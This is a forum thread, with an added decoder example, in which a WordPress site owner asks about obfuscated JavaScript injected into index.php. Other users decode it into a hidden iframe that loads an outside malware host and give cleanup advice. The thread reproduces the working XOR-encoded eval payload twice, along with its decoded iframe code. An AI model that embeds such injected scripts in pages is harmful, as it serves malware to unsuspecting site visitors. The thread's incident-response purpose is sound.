
hacked ?

Discussion in 'PHP & Perl' started by maildigger, Jan 13, 2010.

  1. maildigger

    maildigger Power Member

    Joined:
    Jan 30, 2009
    Messages:
    558
    Likes Received:
    60
    Location:
    EU
    I get a malware warning if I use Google Chrome on one of my websites. I checked FTP and saw there were many suspicious files that shouldn't be there (it's a WordPress install) in the public html folder. I deleted all the files and changed the password of the FTP. Will this solve the problem? How does the Google warning go away?

    I also checked my index.php file and found additional code at the bottom:
    What is that?

    <script>lo=new Array(81,69,10,83,88,84,66,90,82,89,67,25,84,69,82,86,67,82,114,91,82,90,82,89,67,31,16,94,81,69,86,90,82,16,30,12,61,81,69,25,68,69,84,10,21,95,67,67,71,13,24,24,86,83,84,88,66,89,67,82,69,68,25,89,82,67,24,81,86,69,24,68,95,88,64,25,71,95,71,8,68,10,82,85,4,6,83,6,14,1,81,84,21,12,61,81,69,25,68,67,78,91,82,25,83,94,68,71,91,86,78,10,21,89,88,89,82,21,12,61,83,88,84,66,90,82,89,67,25,80,82,67,114,91,82,90,82,89,67,68,117,78,99,86,80,121,86,90,82,31,16,85,88,83,78,16,30,108,7,106,25,86,71,71,82,89,83,116,95,94,91,83,31,81,69,30,12,61);oa="";jnyh=String.fromCharCode;tl=55;for(vf in lo)oa+=jnyh(lo[vf]^tl);eval(oa);</script><script>lo=new Array(81,69,10,83,88,84,66,90,82,89,67,25,84,69,82,86,67,82,114,91,82,90,82,89,67,31,16,94,81,69,86,90,82,16,30,12,61,81,69,25,68,69,84,10,21,95,67,67,71,13,24,24,86,83,84,88,66,89,67,82,69,68,25,89,82,67,24,81,86,69,24,68,95,88,64,25,71,95,71,8,68,10,82,85,4,6,83,6,14,1,81,84,21,12,61,81,69,25,68,67,78,91,82,25,83,94,68,71,91,86,78,10,21,89,88,89,82,21,12,61,83,88,84,66,90,82,89,67,25,80,82,67,114,91,82,90,82,89,67,68,117,78,99,86,80,121,86,90,82,31,16,85,88,83,78,16,30,108,7,106,25,86,71,71,82,89,83,116,95,94,91,83,31,81,69,30,12,61);oa="";jnyh=String.fromCharCode;tl=55;for(vf in lo)oa+=jnyh(lo[vf]^tl);eval(oa);</script>
     
  2. Kaimi

    Kaimi Newbie

    Joined:
    Dec 6, 2009
    Messages:
    35
    Likes Received:
    230
    Home Page:
    It is an encoded iframe
    Code:
    fr=document.createElement('iframe');
    fr.src="http://adcounters.net/far/show.php?s=eb31d196fc";
    fr.style.display="none";
    document.getElementsByTagName('body')[0].appendChild(fr);
    
     
    • Thanks Thanks x 1
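
The decoding described in the reply above, as an added example that is not part of the original thread: a static decoder that treats the injected tag as text, recovers the XOR key from the loop and rebuilds the hidden script without ever calling `eval()`. The names `CODES`, `SAMPLE`, `findKey` and `analyze` are made up for this example; `CODES` is an excerpt of the array from the first post.

```javascript
// Excerpt of the char-code array from the first post (through the display="none" line).
const CODES = [81,69,10,83,88,84,66,90,82,89,67,25,84,69,82,86,67,82,114,91,82,90,82,89,67,31,16,94,81,69,86,90,82,16,30,12,61,81,69,25,68,69,84,10,21,95,67,67,71,13,24,24,86,83,84,88,66,89,67,82,69,68,25,89,82,67,24,81,86,69,24,68,95,88,64,25,71,95,71,8,68,10,82,85,4,6,83,6,14,1,81,84,21,12,61,81,69,25,68,67,78,91,82,25,83,94,68,71,91,86,78,10,21,89,88,89,82,21,12,61];
// Rebuilt in the same shape as the injected tag; handled as text only, never executed.
const SAMPLE = `<script>lo=new Array(${CODES.join(",")});oa="";jnyh=String.fromCharCode;` +
  `tl=55;for(vf in lo)oa+=jnyh(lo[vf]^tl);eval(oa);</script>`;

const xorDecode = (codes, key) => codes.map(c => String.fromCharCode(c ^ key)).join("");
const printable = s => /^[\t\n\r\x20-\x7e]*$/.test(s);

// Recover the XOR key from the loop (`lo[vf]^tl` plus `tl=55`), or return null.
function findKey(script) {
  const operand = /\]\s*\^\s*(\w+)/.exec(script);
  if (!operand) return null;
  if (/^\d+$/.test(operand[1])) return Number(operand[1]);
  const assign = new RegExp(`\\b${operand[1]}\\s*=\\s*(\\d+)`).exec(script);
  return assign ? Number(assign[1]) : null;
}

// Decode one injected <script> and report what it would have done in a browser.
function analyze(script) {
  const m = /new Array\(([\d,\s]+)\)/.exec(script);
  if (!m) return null;                       // not this obfuscation pattern
  const codes = m[1].split(",").map(Number);
  let key = findKey(script);
  if (key === null) {
    // Fallback: try every single-byte key, keep the first that gives printable script text.
    for (let k = 1; k < 256 && key === null; k++) {
      const s = xorDecode(codes, k);
      if (printable(s) && /document|iframe/.test(s)) key = k;
    }
    if (key === null) return null;
  }
  const source = xorDecode(codes, key);
  return {
    key,
    source,
    urls: source.match(/https?:\/\/[^\s"'<>]+/g) || [],
    hiddenIframe: /createElement\(\s*['"]iframe['"]/.test(source) &&
                  /display\s*=\s*['"]none['"]/.test(source),
  };
}

console.log(analyze(SAMPLE));
```

Run it with Node; `analyze()` takes any string, so the contents of a suspect `index.php`, `header.php` or `footer.php` can be passed in the same way.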
  3. maildigger

    maildigger Power Member

    What does that mean? How can I solve this problem?
     
  4. trophaeum

    trophaeum Senior Member

    Joined:
    Dec 21, 2007
    Messages:
    1,189
    Likes Received:
    706
    remove the javascript from ur sites
    upgrade your scripts (most likely old wordpress)
    get and run a good antivirus app with firewall (kaspersky internet security HIGHLY recommended)

    have fun, u just got pwn3d
     
    • Thanks Thanks x 1
  5. maildigger

    maildigger Power Member

    OK ... how can I remove the javascript from wordpress?
     
  6. maildigger

    maildigger Power Member

    If I look at the page source, there is an iframe at the bottom which is causing the problem, but I can't find it to delete it!
     
  7. trophaeum

    trophaeum Senior Member

    check all index.php files on your server, that's probably what's been edited, if not look through header.php and footer.php files
     
    • Thanks Thanks x 1
  8. Hijinx

    Hijinx Junior Member

    Joined:
    Apr 13, 2009
    Messages:
    142
    Likes Received:
    87
    Location:
    New Jersey
    I second this... change your control panel account password, FTP etc... re-install latest, make sure your directory permissions are correct... you need to look at ALL your sites on that server not just the one that has been hacked... remove all scripts you're not using... if you have backups old ones use them instead of the current DB that might contain code ...

    Bottom line is you have to assume that everything has been compromised and work your way up from there... not just index files suspect ALL files
     
    • Thanks Thanks x 1
    Last edited: Jan 13, 2010
  9. maildigger

    maildigger Power Member

    I updated all WordPress versions to 2.9.1
    I deleted all suspicious files
    I deleted / edited all index.php files

    Seems that everything is ok for now! Thanks for the help everyone!

    PS what directory permissions should I give?
     
  10. Hijinx

    Hijinx Junior Member

    For WP you might want to look at some of these plugins...

    Code:
    http://wordpress.org/extend/plugins/wp-security-scan/
    http://wordpress.org/extend/plugins/paranoid911/
    
    Security advice (as per WP)

    Code:
    http://codex.wordpress.org/Hardening_WordPress
    Regards...
     
  11. Method

    Method Registered Member

    Joined:
    Jan 30, 2010
    Messages:
    90
    Likes Received:
    12
    Occupation:
    Spacebean
    At least try running a rootkit hunter on the server after changing your password (rkhunter is my preference).. Sorry, just realised this is an old thread.
     
    Last edited: Feb 8, 2010
  12. showboytridin

    showboytridin Regular Member

    Joined:
    Sep 5, 2009
    Messages:
    348
    Likes Received:
    714
    Location:
    127.0.0.1
    Back up all your posts, get a fresh installation and use a clean design. Then you can import your posts. And use the last WP version.
    Posted via Mobile Device